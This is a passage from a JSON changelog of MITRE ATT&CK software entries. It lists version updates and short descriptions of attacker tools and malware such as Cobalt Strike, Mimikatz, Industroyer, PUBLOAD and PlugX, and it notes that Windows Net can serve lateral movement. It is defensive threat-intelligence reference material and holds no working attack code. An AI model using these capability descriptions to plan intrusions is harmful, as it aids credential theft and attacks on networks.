                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-17 20:59:19.130000+00:00\", \"old_value\": \"2025-04-16 20:38:50.933000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.3\", \"old_value\": \"1.2\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 1.3"
                },
                {
                    "type": "tool",
                    "id": "tool--64764dc6-a032-495f-8250-1e4c06bdc163",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2018-04-18 17:59:24.739000+00:00",
                    "modified": "2026-04-17 14:09:31.571000+00:00",
                    "name": "BITSAdmin",
                    "description": "[BITSAdmin](https://attack.mitre.org/software/S0190) is a command line tool used to create and manage [BITS Jobs](https://attack.mitre.org/techniques/T1197). (Citation: Microsoft BITSAdmin)",
                    "revoked": false,
                    "labels": [
                        "tool"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S0190",
                            "external_id": "S0190"
                        },
                        {
                            "source_name": "Microsoft BITSAdmin",
                            "description": "Microsoft. (n.d.). BITSAdmin Tool. Retrieved January 12, 2018.",
                            "url": "https://msdn.microsoft.com/library/aa362813.aspx"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "BITSAdmin"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Edward Millington"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.5",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-17 14:09:31.571000+00:00\", \"old_value\": \"2025-04-16 20:38:52.586000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.5\", \"old_value\": \"1.4\"}}}",
                    "previous_version": "1.4",
                    "version_change": "1.4 \u2192 1.5"
                },
                {
                    "type": "malware",
                    "id": "malware--a7881f21-e978-4fe4-af56-92c9416a2616",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2017-12-14 16:46:06.044000+00:00",
                    "modified": "2026-04-23 21:14:18.712000+00:00",
                    "name": "Cobalt Strike",
                    "description": "[Cobalt Strike](https://attack.mitre.org/software/S0154) is a commercial, full-featured, remote access tool that bills itself as \u201cadversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors\u201d. Cobalt Strike\u2019s interactive post-exploit capabilities cover the full range of ATT&CK tactics, all executed within a single, integrated system.(Citation: cobaltstrike manual)\n\nIn addition to its own capabilities, [Cobalt Strike](https://attack.mitre.org/software/S0154) leverages the capabilities of other well-known tools such as Metasploit and [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: cobaltstrike manual)",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S0154",
                            "external_id": "S0154"
                        },
                        {
                            "source_name": "cobaltstrike manual",
                            "description": "Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual. Retrieved May 24, 2017.",
                            "url": "https://web.archive.org/web/20210825130434/https://cobaltstrike.com/downloads/csmanual38.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "Cobalt Strike"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Josh Abraham",
                        "Martin Sohn Christensen, Improsec"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "1.14",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 21:14:18.712000+00:00\", \"old_value\": \"2024-09-25 20:32:57.099000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.14\", \"old_value\": \"1.13\"}}}",
                    "previous_version": "1.13",
                    "version_change": "1.13 \u2192 1.14"
                },
                {
                    "type": "tool",
                    "id": "tool--36dd807e-b5bc-4c3e-91ed-80682360148c",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2024-07-10 18:46:33.555000+00:00",
                    "modified": "2026-04-19 16:36:54.302000+00:00",
                    "name": "FRP",
                    "description": "[FRP](https://attack.mitre.org/software/S1144), which stands for Fast Reverse Proxy, is an openly available tool that is capable of exposing a server located behind a firewall or Network Address Translation (NAT) to the Internet. [FRP](https://attack.mitre.org/software/S1144) can support multiple protocols including TCP, UDP, and HTTP(S) and has been abused by threat actors to proxy command and control communications.(Citation: FRP GitHub)(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023)(Citation: RedCanary Mockingbird May 2020)(Citation: DFIR Phosphorus November 2021)",
                    "revoked": false,
                    "labels": [
                        "tool"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S1144",
                            "external_id": "S1144"
                        },
                        {
                            "source_name": "DFIR Phosphorus November 2021",
                            "description": "DFIR Report. (2021, November 15). Exchange Exploit Leads to Domain Wide Ransomware. Retrieved January 5, 2023.",
                            "url": "https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/"
                        },
                        {
                            "source_name": "FRP GitHub",
                            "description": "fatedier. (n.d.). What is frp?. Retrieved July 10, 2024.",
                            "url": "https://github.com/fatedier/frp"
                        },
                        {
                            "source_name": "RedCanary Mockingbird May 2020",
                            "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020.",
                            "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/"
                        },
                        {
                            "source_name": "Joint Cybersecurity Advisory Volt Typhoon June 2023",
                            "description": "NSA et al. (2023, May 24). People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection. Retrieved July 27, 2023.",
                            "url": "https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "FRP"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-19 16:36:54.302000+00:00\", \"old_value\": \"2024-07-30 18:17:09.725000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1"
                },
                {
                    "type": "malware",
                    "id": "malware--1996aed9-6234-4c1d-a145-e8a4913679dd",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-08-05 18:12:15.228000+00:00",
                    "modified": "2026-04-20 12:17:28.794000+00:00",
                    "name": "Havoc",
                    "description": "[Havoc](https://attack.mitre.org/software/S1229) is an open-source post-exploitation command and control (C2) framework first released on GitHub in October 2022 by C5pider (Paul Ungur), who continues to maintain and develop it with community contributors. [Havoc](https://attack.mitre.org/software/S1229) provides a wide range of offensive security capabilities and has been adopted by multiple threat actors to establish and maintain control over compromised systems.",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S1229",
                            "external_id": "S1229"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "Havoc"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Enis Aksu"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-20 12:17:28.794000+00:00\", \"old_value\": \"2025-10-24 03:07:43.276000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1"
                },
                {
                    "type": "malware",
                    "id": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-01-04 20:42:21.997000+00:00",
                    "modified": "2026-04-23 14:11:53.057000+00:00",
                    "name": "Industroyer",
                    "description": "[Industroyer](https://attack.mitre.org/software/S0604) is a sophisticated malware framework designed to cause an impact to the working processes of Industrial Control Systems (ICS), specifically components used in electrical substations.(Citation: ESET Industroyer) [Industroyer](https://attack.mitre.org/software/S0604) was used in the attacks on the Ukrainian power grid in December 2016.(Citation: Dragos Crashoverride 2017) This is the first publicly known malware specifically designed to target and impact operations in the electric grid.(Citation: Dragos Crashoverride 2018)",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S0604",
                            "external_id": "S0604"
                        },
                        {
                            "source_name": "CRASHOVERRIDE",
                            "description": "(Citation: Dragos Crashoverride 2017)"
                        },
                        {
                            "source_name": "Win32/Industroyer",
                            "description": "(Citation: ESET Industroyer)"
                        },
                        {
                            "source_name": "ESET Industroyer",
                            "description": "Anton Cherepanov. (2017, June 12). Win32/Industroyer: A new threat for industrial controls systems. Retrieved December 18, 2020.",
                            "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf"
                        },
                        {
                            "source_name": "Dragos Crashoverride 2017",
                            "description": "Dragos Inc.. (2017, June 13). CRASHOVERRIDE Analysis of the Threat to Electric Grid Operations. Retrieved December 18, 2020.",
                            "url": "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf"
                        },
                        {
                            "source_name": "Dragos Crashoverride 2018",
                            "description": "Joe Slowik. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. Retrieved December 18, 2020.",
                            "url": "https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "Industroyer",
                        "CRASHOVERRIDE",
                        "Win32/Industroyer"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Dragos Threat Intelligence",
                        "Joe Slowik - Dragos"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack",
                        "ics-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.2",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 14:11:53.057000+00:00\", \"old_value\": \"2024-04-11 16:06:34.700000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.2\", \"old_value\": \"1.1\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 1.2"
                },
                {
                    "type": "malware",
                    "id": "malware--5af7a825-2d9f-400d-931a-e00eb9e27f48",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2019-04-16 19:00:49.435000+00:00",
                    "modified": "2026-04-22 22:21:12.036000+00:00",
                    "name": "LockerGoga",
                    "description": "[LockerGoga](https://attack.mitre.org/software/S0372) is ransomware that was first reported in January 2019, and has been tied to various attacks on European companies, including industrial and manufacturing firms.(Citation: Unit42 LockerGoga 2019)(Citation: CarbonBlack LockerGoga 2019)",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S0372",
                            "external_id": "S0372"
                        },
                        {
                            "source_name": "CarbonBlack LockerGoga 2019",
                            "description": "CarbonBlack Threat Analysis Unit. (2019, March 22). TAU Threat Intelligence Notification \u2013 LockerGoga Ransomware. Retrieved April 16, 2019.",
                            "url": "https://www.carbonblack.com/2019/03/22/tau-threat-intelligence-notification-lockergoga-ransomware/"
                        },
                        {
                            "source_name": "Unit42 LockerGoga 2019",
                            "description": "Harbison, M. (2019, March 26). Born This Way? Origins of LockerGoga. Retrieved April 16, 2019.",
                            "url": "https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "LockerGoga"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Joe Slowik - Dragos"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack",
                        "ics-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "2.1",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-22 22:21:12.036000+00:00\", \"old_value\": \"2023-10-17 20:05:34.648000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 2.1"
                },
                {
                    "type": "tool",
                    "id": "tool--afc079f3-c0ea-4096-b75d-3f05338b7f60",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2017-05-31 21:32:11.544000+00:00",
                    "modified": "2026-04-19 18:13:24.015000+00:00",
                    "name": "Mimikatz",
                    "description": "[Mimikatz](https://attack.mitre.org/software/S0002) is a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks. (Citation: Deply Mimikatz) (Citation: Adsecurity Mimikatz Guide)",
                    "revoked": false,
                    "labels": [
                        "tool"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S0002",
                            "external_id": "S0002"
                        },
                        {
                            "source_name": "Deply Mimikatz",
                            "description": "Deply, B. (n.d.). Mimikatz. Retrieved September 29, 2015.",
                            "url": "https://github.com/gentilkiwi/mimikatz"
                        },
                        {
                            "source_name": "Adsecurity Mimikatz Guide",
                            "description": "Metcalf, S. (2015, November 13). Unofficial Guide to Mimikatz & Command Reference. Retrieved December 23, 2015.",
                            "url": "https://adsecurity.org/?page_id=1821"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "Mimikatz"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Vincent Le Toux"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.11",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-19 18:13:24.015000+00:00\", \"old_value\": \"2024-11-27 21:53:57.705000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.11\", \"old_value\": \"1.10\"}}}",
                    "previous_version": "1.10",
                    "version_change": "1.10 \u2192 1.11"
                },
                {
                    "type": "tool",
                    "id": "tool--03342581-f790-4f03-ba41-e82e67392e23",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2017-05-31 21:32:31.601000+00:00",
                    "modified": "2026-04-17 14:16:53.721000+00:00",
                    "name": "Net",
                    "description": "The [Net](https://attack.mitre.org/software/S0039) utility is a component of the Windows operating system. It is used in command-line operations for control of users, groups, services, and network connections. (Citation: Microsoft Net Utility)\n\n[Net](https://attack.mitre.org/software/S0039) has a great deal of functionality, (Citation: Savill 1999) much of which is useful for an adversary, such as gathering system and network information for Discovery, moving laterally through [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) using <code>net use</code> commands, and interacting with services. The net1.exe utility is executed for certain functionality when net.exe is run and can be used directly in commands such as <code>net1 user</code>.",
                    "revoked": false,
                    "labels": [
                        "tool"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S0039",
                            "external_id": "S0039"
                        },
                        {
                            "source_name": "Microsoft Net Utility",
                            "description": "Microsoft. (2006, October 18). Net.exe Utility. Retrieved September 22, 2015.",
                            "url": "https://msdn.microsoft.com/en-us/library/aa939914"
                        },
                        {
                            "source_name": "Savill 1999",
                            "description": "Savill, J. (1999, March 4). Net.exe reference. Retrieved September 22, 2015.",
                            "url": "https://web.archive.org/web/20150511162820/http://windowsitpro.com/windows/netexe-reference"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "Net",
                        "net.exe"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "David Ferguson, CyberSponse"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "2.8",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-17 14:16:53.721000+00:00\", \"old_value\": \"2024-11-27 21:55:29.681000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.8\", \"old_value\": \"2.7\"}}}",
                    "previous_version": "2.7",
                    "version_change": "2.7 \u2192 2.8"
                },
                {
                    "type": "tool",
                    "id": "tool--981acc4c-2ede-4b56-be6e-fa1a75f37acf",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2019-02-14 17:08:55.176000+00:00",
                    "modified": "2026-04-17 13:17:52.139000+00:00",
                    "name": "Nltest",
                    "description": "[Nltest](https://attack.mitre.org/software/S0359) is a Windows command-line utility used to list domain controllers and enumerate domain trusts.(Citation: Nltest Manual)",
                    "revoked": false,
                    "labels": [
                        "tool"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S0359",
                            "external_id": "S0359"
                        },
                        {
                            "source_name": "Nltest Manual",
                            "description": "ss64. (n.d.). NLTEST.exe - Network Location Test. Retrieved February 14, 2019.",
                            "url": "https://ss64.com/nt/nltest.html"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "Nltest"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.4",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-17 13:17:52.139000+00:00\", \"old_value\": \"2024-09-25 20:27:04.356000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.4\", \"old_value\": \"1.3\"}}}",
                    "previous_version": "1.3",
                    "version_change": "1.3 \u2192 1.4"
                },
                {
                    "type": "malware",
                    "id": "malware--3824852d-1957-4712-9da0-38143723c060",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-08-04 16:35:44.800000+00:00",
                    "modified": "2026-04-08 13:51:05.286000+00:00",
                    "name": "PUBLOAD",
                    "description": "[PUBLOAD](https://attack.mitre.org/software/S1228) is a stager malware that has been observed installing itself in existing directories such as `C:\\Users\\Public` or creating new directories to stage the malware and its components.(Citation: 2022 November_TrendMicro_Earth Preta_Toneshell_Pubload)  [PUBLOAD](https://attack.mitre.org/software/S1228) malware collects details of the victim host, establishes persistence, encrypts victim details using RC4 and communicates victim details back to C2.  [PUBLOAD](https://attack.mitre.org/software/S1228) malware has previously been leveraged by China-affiliated actors identified as [Mustang Panda](https://attack.mitre.org/groups/G0129).   [PUBLOAD](https://attack.mitre.org/software/S1228) is also known as \u201cNoFive\u201d and some public reporting identifies the loader component as [CLAIMLOADER](https://attack.mitre.org/software/S1236).(Citation: 2025_IBM_PUBLOAD_TONESHELL_HIUPAN_CLAIMLOADER_MUSTANG PANDA)",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S1228",
                            "external_id": "S1228"
                        },
                        {
                            "source_name": "2025_IBM_PUBLOAD_TONESHELL_HIUPAN_CLAIMLOADER_MUSTANG PANDA",
                            "description": "Golo Muhr, Joshua Chung. (2025, May 15). Hive0154 targeting US, Philippines, Pakistan and Taiwan in suspected espionage campaign. Retrieved August 4, 2025.",
                            "url": "https://www.ibm.com/think/x-force/hive0154-targeting-us-philippines-pakistan-taiwan"
                        },
                        {
                            "source_name": "2022 November_TrendMicro_Earth Preta_Toneshell_Pubload",
                            "description": "Nick Dai, Vickie Su, Sunny Lu. (2022, November 18). Earth Preta Spear-Phishing Governments Worldwide. Retrieved August 4, 2025.",
                            "url": "https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "PUBLOAD"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-08 13:51:05.286000+00:00\", \"old_value\": \"2025-10-24 02:46:58.268000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1"
                },
                {
                    "type": "tool",
                    "id": "tool--b77b563c-34bb-4fb8-86a3-3694338f7b47",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2017-05-31 21:33:01.483000+00:00",
                    "modified": "2026-04-17 14:17:47.775000+00:00",
                    "name": "Ping",
                    "description": "[Ping](https://attack.mitre.org/software/S0097) is an operating system utility commonly used to troubleshoot and verify network connections. (Citation: TechNet Ping)",
                    "revoked": false,
                    "labels": [
                        "tool"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S0097",
                            "external_id": "S0097"
                        },
                        {
                            "source_name": "TechNet Ping",
                            "description": "Microsoft. (n.d.). Ping. Retrieved April 8, 2016.",
                            "url": "https://technet.microsoft.com/en-us/library/bb490968.aspx"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "Ping"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.5",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-17 14:17:47.775000+00:00\", \"old_value\": \"2025-04-16 20:38:55.518000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.5\", \"old_value\": \"1.4\"}}}",
                    "previous_version": "1.4",
                    "version_change": "1.4 \u2192 1.5"
                },
                {
                    "type": "malware",
                    "id": "malware--64fa0de0-6240-41f4-8638-f4ca7ed528fd",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2017-05-31 21:32:15.638000+00:00",
                    "modified": "2025-11-20 22:48:45.121000+00:00",
                    "name": "PlugX",
                    "description": "[PlugX](https://attack.mitre.org/software/S0013) is a remote access tool (RAT) with modular plugins that has been used by multiple threat groups.(Citation: Lastline PlugX Analysis)(Citation: FireEye Clandestine Fox Part 2)(Citation: New DragonOK)(Citation: Dell TG-3390)",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S0013",
                            "external_id": "S0013"
                        },
                        {
                            "source_name": "DestroyRAT",
                            "description": "(Citation: CIRCL PlugX March 2013)"
                        },
                        {
                            "source_name": "Kaba",
                            "description": "(Citation: FireEye Clandestine Fox Part 2)"
                        },
                        {
                            "source_name": "PlugX",
                            "description": "(Citation: Lastline PlugX Analysis) (Citation: FireEye Clandestine Fox Part 2)(Citation: CIRCL PlugX March 2013)"
                        },
                        {
                            "source_name": "Korplug",
                            "description": "(Citation: Lastline PlugX Analysis)(Citation: CIRCL PlugX March 2013)"
                        },
                        {
                            "source_name": "Sogu",
                            "description": "(Citation: Lastline PlugX Analysis)(Citation: FireEye Clandestine Fox Part 2)(Citation: CIRCL PlugX March 2013)"
                        },
                        {
                            "source_name": "Thoper",
                            "description": "(Citation: Novetta-Axiom)"
                        },
                        {
                            "source_name": "TVT",
                            "description": "(Citation: Novetta-Axiom)"
                        },
                        {
                            "source_name": "CIRCL PlugX March 2013",
                            "description": "Computer Incident Response Center Luxembourg. (2013, March 29). Analysis of a PlugX variant. Retrieved November 5, 2018.",
                            "url": "http://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf"
                        },
                        {
                            "source_name": "Dell TG-3390",
                            "description": "Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved August 18, 2018.",
                            "url": "https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage"
                        },
                        {
                            "source_name": "New DragonOK",
                            "description": "Miller-Osborn, J., Grunzweig, J.. (2015, April). Unit 42 Identifies New DragonOK Backdoor Malware Deployed Against Japanese Targets. Retrieved November 4, 2015.",
                            "url": "http://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/"
                        },
                        {
                            "source_name": "Novetta-Axiom",
                            "description": "Novetta. (n.d.). Operation SMN: Axiom Threat Actor Group Report. Retrieved November 12, 2014.",
                            "url": "https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf"
                        },
                        {
                            "source_name": "FireEye Clandestine Fox Part 2",
                            "description": "Scott, M.. (2014, June 10). Clandestine Fox, Part Deux. Retrieved January 14, 2016.",
                            "url": "https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html"
                        },
                        {
                            "source_name": "Lastline PlugX Analysis",
